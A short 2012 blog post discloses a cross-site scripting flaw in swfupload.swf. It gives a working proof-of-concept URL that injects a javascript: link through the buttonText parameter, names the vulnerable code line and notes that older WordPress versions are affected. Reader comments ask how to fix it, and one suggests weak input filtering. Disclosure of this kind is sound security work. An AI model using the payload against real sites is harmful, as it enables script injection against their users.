Sunday, December 9, 2012

swfupload.swf XSS

Hi,

Just want to share my finding,

I found another XSS Vulnerability in swfupload.swf


PoC:

http://demo.swfupload.org/v220/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert%28top.location%29%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E




Vulnerable Parameter:

buttonText

Vulnerable Code:

this.buttonTextField.htmlText = this.buttonText;



(For Wordpress Fans, Works on Version 3.3.1 and below)


Enjoy...

3 comments:

VariousE said...

Nice one!

Buck said...

How would you go about fixing this?

I don't see that AS3 provides a way to not render HTML in a textField. In AS2 there was a .html configuration boolean property, but it seems to have disappeared. I had hoped assigning to .text would do it, but no luck.

Nir Goldshlager said...

Use Regex (Client Side), Block malicious input,

For example:

<,>, etc...


:)

Post a Comment